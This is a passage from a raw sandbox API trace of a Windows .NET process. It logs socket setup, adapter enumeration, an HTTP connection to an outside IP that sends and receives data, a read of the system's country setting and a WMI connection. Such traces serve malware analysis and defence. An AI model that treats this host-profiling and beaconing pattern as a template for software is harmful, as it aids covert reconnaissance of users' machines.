lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x39c [0128.370] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390 [0128.370] ioctlsocket (in: s=0x39c, cmd=-2147195266, argp=0x189ec4 | out: argp=0x189ec4) returned 0 [0128.370] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3a0 [0128.371] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a4 [0128.371] ioctlsocket (in: s=0x3a0, cmd=-2147195266, argp=0x189ec4 | out: argp=0x189ec4) returned 0 [0128.371] WSAIoctl (in: s=0x39c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x189eac, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x189eac, lpOverlapped=0x0) returned -1 [0128.371] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x189bdc, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0128.371] WSAEventSelect (s=0x39c, hEventObject=0x390, lNetworkEvents=512) returned 0 [0128.371] WSAIoctl (in: s=0x3a0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x189eac, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x189eac, lpOverlapped=0x0) returned -1 [0128.371] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x189bdc, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0128.371] WSAEventSelect (s=0x3a0, hEventObject=0x3a4, lNetworkEvents=512) returned 0 [0128.372] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x189ea8*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x189ea8*=0xa5c) returned 0x6f [0128.378] LocalAlloc (uFlags=0x0, uBytes=0xa5c) returned 0x4b19080 [0128.378] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x4b19080, SizePointer=0x189ea8*=0xa5c | out: AdapterAddresses=0x4b19080*(Alignment=0xe00000178, Length=0x178, IfIndex=0xe, Next=0x4b19344, AdapterName="{89C47688-58E9-48ED-A232-2A7897FAD591}", FirstUnicastAddress=0x4b192b8, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x48, [1]=0x52, [2]=0x61, [3]=0xdd, [4]=0xd7, [5]=0x90, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x4b191f8*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xe8, [6]=0x2e, [7]=0xf0, [8]=0x0, [9]=0x60, [10]=0x38, [11]=0x9b, [12]=0xba, [13]=0x1, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11006038, FirstDnsSuffix=0x0), SizePointer=0x189ea8*=0xa5c) returned 0x0 [0128.388] LocalFree (hMem=0x4b19080) returned 0x0 [0128.390] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x189ebc | out: phkResult=0x189ebc*=0x3a8) returned 0x0 [0128.390] RegQueryValueExW (in: hKey=0x3a8, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x189ed8, lpData=0x0, lpcbData=0x189ed4*=0x0 | out: lpType=0x189ed8*=0x0, lpData=0x0, lpcbData=0x189ed4*=0x0) returned 0x2 [0128.390] RegCloseKey (hKey=0x3a8) returned 0x0 [0128.391] WSAConnect (in: s=0x388, name=0x269a0e0*(sa_family=2, sin_port=0x50, sin_addr="54.225.195.221"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0128.560] closesocket (s=0x384) returned 0 [0128.564] send (s=0x388, buf=0x269ada0*, len=63, flags=0) returned 63 [0128.565] setsockopt (s=0x388, level=65535, optname=4102, optval="\x10'", optlen=4) returned 0 [0128.566] recv (in: s=0x388, buf=0x26948c4, len=4096, flags=0 | out: buf=0x26948c4*) returned 184 [0128.791] setsockopt (s=0x388, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0128.791] SetEvent (hEvent=0x244) returned 1 [0128.854] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\International\\Geo", ulOptions=0x0, samDesired=0x20019, phkResult=0x18a178 | out: phkResult=0x18a178*=0x384) returned 0x0 [0128.861] RegQueryValueExW (in: hKey=0x384, lpValueName="Nation", lpReserved=0x0, lpType=0x18a198, lpData=0x0, lpcbData=0x18a194*=0x0 | out: lpType=0x18a198*=0x1, lpData=0x0, lpcbData=0x18a194*=0x8) returned 0x0 [0128.861] RegQueryValueExW (in: hKey=0x384, lpValueName="Nation", lpReserved=0x0, lpType=0x18a198, lpData=0x26a54a0, lpcbData=0x18a194*=0x8 | out: lpType=0x18a198*=0x1, lpData="244", lpcbData=0x18a194*=0x8) returned 0x0 [0129.180] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b0 [0129.183] CoGetObjectContext (in: riid=0x26c86b8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189a50 | out: ppv=0x189a50*=0x75849c) returned 0x0 [0129.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x188ce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0129.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x1891e0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll\x01ò\x18\x7fpÝ\x8b\x07È\x94ÂAtØ\x94\x18", lpUsedDefaultChar=0x0) returned 63 [0129.203] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x74f60000 [0129.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x189214, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity\x1a\x7fpÝ\x8b\x07È\x94ÂAtØ\x94\x18", lpUsedDefaultChar=0x0) returned 13 [0129.323] GetProcAddress (hModule=0x74f60000, lpProcName="ResetSecurity") returned 0x74f624de [0129.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x189214, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity\x01D\x1a\x7fpÝ\x8b\x07È\x94ÂAtØ\x94\x18", lpUsedDefaultChar=0x0) returned 11 [0129.331] GetProcAddress (hModule=0x74f60000, lpProcName="SetSecurity") returned 0x74f62520 [0129.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x189210, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices\x7fpÝ\x8b\x07È\x94ÂAtØ\x94\x18", lpUsedDefaultChar=0x0) returned 18 [0129.340] GetProcAddress (hModule=0x74f60000, lpProcName="BlessIWbemServices") returned 0x74f61c69 [0129.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x189208, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObjectD\x1a\x7fpÝ\x8b\x07È\x94ÂAtØ\x94\x18", lpUsedDefaultChar=0x0) returned 24 [0129.356] GetProcAddress (hModule=0x74f60000, lpProcName="BlessIWbemServicesObject") returned 0x74f61cbb [0129.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x189210, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle\x1a\x7fpÝ\x8b\x07È\x94ÂAtØ\x94\x18", lpUsedDefaultChar=0x0) returned 17 [0129.363] GetProcAddress (hModule=0x74f60000, lpProcName="GetPropertyHandle") returned 0x74f621b4 [0129.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x189210, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue\x7fpÝ\x8b\x07È\x94ÂAtØ\x94\x18", lpUsedDefaultChar=0x0) returned 18 [0129.399] GetProcAddress (hModule=0x74f60000, lpProcName="WritePropertyValue") returned 0x74f62617 [0129.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x18921c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a\x7fpÝ\x8b\x07È\x94ÂAtØ\x94\x18", lpUsedDefaultChar=0x0) returned 5 [0129.403] GetProcAddress (hModule=0x74f60000, lpProcName="Clone") returned 0x74f61d0d [0129.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x189210, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey\x01D\x1a\x7fpÝ\x8b\x07È\x94ÂAtØ\x94\x18", lpUsedDefaultChar=0x0) returned 15 [0129.406] GetProcAddress (hModule=0x74f60000, lpProcName="VerifyClientKey") returned 0x74f625b4 [0129.462] IComThreadingInfo:GetCurrentApartmentType (in: This=0x75849c, pAptType=0x189a48 | out: pAptType=0x189a48*=1) returned 0x0 [0129.464] IUnknown:QueryInterface (in: This=0x75849c, riid=0x26c86a0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x189a4c | out: ppvObject=0x189a4c*=0x0) returned 0x80004002 [0129.464] IUnknown:Release (This=0x75849c) returned 0x0 [0129.475] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x1896a4 | out: lpiid=0x1896a4) returned 0x0 [0129.477] CoGetClassObject (in: rclsid=0x4bf972c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x744bd1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1893b8 | out: ppv=0x1893b8*=0x5930810) returned 0x0 [0129.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x5930810, riid=0x744f0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1895d0 | out: ppvObject=0x1895d0*=0x0) returned 0x80004002 [0129.891] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5930810, pUnkOuter=0x0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1895e4 | out: ppvObject=0x1895e4*=0x5930820) returned 0x0 [0129.891] WbemDefPath:IUnknown:Release (This=0x5930810) returned 0x0 [0129.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x5930820, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189204 | out: ppvObject=0x189204*=0x5930820) returned 0x0 [0129.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x5930820, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1891c0 | out: ppvObject=0x1891c0*=0x0) returned 0x80004002 [0129.892] WbemDefPath:IUnknown:AddRef (This=0x5930820) returned 0x3 [0129.892] WbemDefPath:IUnknown:QueryInterface (in: This=0x5930820, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x188b1c | out: ppvObject=0x188b1c*=0x0) returned 0x80004002 [0129.892] WbemDefPath:IUnknown:QueryInterface (in: This=0x5930820, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x188acc | out: ppvObject=0x188acc*=0x0) returned 0x80004002 [0129.892] WbemDefPath:IUnknown:QueryInterface (in: This=0x5930820, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x188ad8 | out: ppvObject=0x188ad8*=0x4be1be0) returned 0x0 [0129.892] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x4be1be0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x188ae0 | out: pCid=0x188ae0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0129.892] WbemDefPath:IUnknown:Release (This=0x4be1be0) returned 0x3 [0129.892] CoGetContextToken (in: pToken=0x188b38 | out: pToken=0x188b38) returned 0x0 [0129.893] CoGetContextToken (in: pToken=0x188f40 | out: pToken=0x188f40) returned 0x0 [0129.893] WbemDefPath:IUnknown:QueryInterface (in: This=0x5930820, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x188fd0 | out: ppvObject=0x188fd0*=0x0) returned 0x80004002 [0129.893] WbemDefPath:IUnknown:Release (This=0x5930820) returned 0x2 [0129.893] WbemDefPath:IUnknown:Release (This=0x5930820) returned 0x1 [0129.893] CoGetContextToken (in: pToken=0x1898c8 | out: pToken=0x1898c8) returned 0x0 [0129.893] CoGetContextToken (in: pToken=0x189828 | out: pToken=0x189828) returned 0x0 [0129.893] WbemDefPath:IUnknown:QueryInterface (in: This=0x5930820, riid=0x1898f8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1898f4 | out: ppvObject=0x1898f4*=0x5930820) returned 0x0 [0129.893] WbemDefPath:IUnknown:AddRef (This=0x5930820) returned 0x3 [0129.893] WbemDefPath:IUnknown:Release (This=0x5930820) returned 0x2 [0129.894] WbemDefPath:IWbemPath:SetText (This=0x5930820, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0129.895] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a174 | out: puCount=0x18a174*=0x2) returned 0x0 [0129.895] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a170*=0x0, pszText=0x0 | out: puBuffLength=0x18a170*=0xf, pszText=0x0) returned 0x0 [0129.896] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=4, puBuffLength=0x18a170*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a170*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0129.903] CoGetObjectContext (in: riid=0x26c86b8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a0fc | out: ppv=0x18a0fc*=0x75849c) returned 0x0 [0129.903] IComThreadingInfo:GetCurrentApartmentType (in: This=0x75849c, pAptType=0x18a0f4 | out: pAptType=0x18a0f4*=1) returned 0x0 [0129.903] IUnknown:QueryInterface (in: This=0x75849c, riid=0x26c86a0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a0f8 | out: ppvObject=0x18a0f8*=0x0) returned 0x80004002 [0129.903] IUnknown:Release (This=0x75849c) returned 0x0 [0129.903] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x18a004 | out: lpiid=0x18a004) returned 0x0 [0129.904] CoGetClassObject (in: rclsid=0x4bf975c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x744bd1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189d18 | out: ppv=0x189d18*=0x59308e0) returned 0x0 [0130.072] WbemLocator:IUnknown:QueryInterface (in: This=0x59308e0, riid=0x744f0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189f30 | out: ppvObject=0x189f30*=0x0) returned 0x80004002 [0130.072] WbemLocator:IClassFactory:CreateInstance (in: This=0x59308e0, pUnkOuter=0x0, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f44 | out: ppvObject=0x189f44*=0x5930a00) returned 0x0 [0130.072] WbemLocator:IUnknown:Release (This=0x59308e0) returned 0x0 [0130.072] WbemLocator:IUnknown:QueryInterface (in: This=0x5930a00, riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b64 | out: ppvObject=0x189b64*=0x5930a00) returned 0x0 [0130.072] WbemLocator:IUnknown:QueryInterface (in: This=0x5930a00, riid=0x7455fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b20 | out: ppvObject=0x189b20*=0x0) returned 0x80004002 [0130.072] WbemLocator:IUnknown:AddRef (This=0x5930a00) returned 0x3 [0130.072] WbemLocator:IUnknown:QueryInterface (in: This=0x5930a00, riid=0x7455f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x18947c | out: ppvObject=0x18947c*=0x0) returned 0x80004002 [0130.072] WbemLocator:IUnknown:QueryInterface (in: This=0x5930a00, riid=0x7455f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x18942c | out: ppvObject=0x18942c*=0x0) returned 0x80004002 [0130.072] WbemLocator:IUnknown:QueryInterface (in: This=0x5930a00, riid=0x7454c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189438 | out: ppvObject=0x189438*=0x0) returned 0x80004002 [0130.072] CoGetContextToken (in: pToken=0x189498 | out: pToken=0x189498) returned 0x0 [0130.072] CoGetObjectContext (in: riid=0x7442e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x4b2240c | out: ppv=0x4b2240c*=0x758490) returned 0x0 [0130.072] CoGetContextToken (in: pToken=0x1898a0 | out: pToken=0x1898a0) returned 0x0 [0130.073] WbemLocator:IUnknown:QueryInterface (in: This=0x5930a00, riid=0x7455fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189930 | out: ppvObject=0x189930*=0x0) returned 0x80004002 [0130.073] WbemLocator:IUnknown:Release (This=0x5930a00) returned 0x2 [0130.073] WbemLocator:IUnknown:Release (This=0x5930a00) returned 0x1 [0130.073] CoGetContextToken (in: pToken=0x189f10 | out: pToken=0x189f10) returned 0x0 [0130.073] CoGetContextToken (in: pToken=0x189e70 | out: pToken=0x189e70) returned 0x0 [0130.073] WbemLocator:IUnknown:QueryInterface (in: This=0x5930a00, riid=0x189f40*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189f3c | out: ppvObject=0x189f3c*=0x5930a00) returned 0x0 [0130.073] WbemLocator:IUnknown:AddRef (This=0x5930a00) returned 0x3 [0130.073] WbemLocator:IUnknown:Release (This=0x5930a00) returned 0x2 [0130.074] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5930820, puCount=0x18a0d8 | out: puCount=0x18a0d8*=0x2) returned 0x0 [0130.074] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=8, puBuffLength=0x18a0d4*=0x0, pszText=0x0 | out: puBuffLength=0x18a0d4*=0xf, pszText=0x0) returned 0x0 [0130.074] WbemDefPath:IWbemPath:GetText (in: This=0x5930820, lFlags=8, puBuffLength=0x18a0d4*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a0d4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0130.075] CoCreateInstance (in: rclsid=0x74f61284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74f612e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x189fb0 | out: ppv=0x189fb0*=0x5930a10) returned 0x0 [0130.075] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5930a10, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x18a044 | out: ppNamespace=0x18a044*=0x593d204) returned 0x0 [0131.181] WbemLocator:IUnknown:QueryInterface (in: This=0x593d204, riid=0x74f61104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ee0 | out: ppvObject=0x189ee0*=0x4b2cb7c) returned 0x0 [0131.182] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x4b2cb7c, pProxy=0x593d204, pAuthnSvc=0x189f30, pAuthzSvc=0x189f2c, 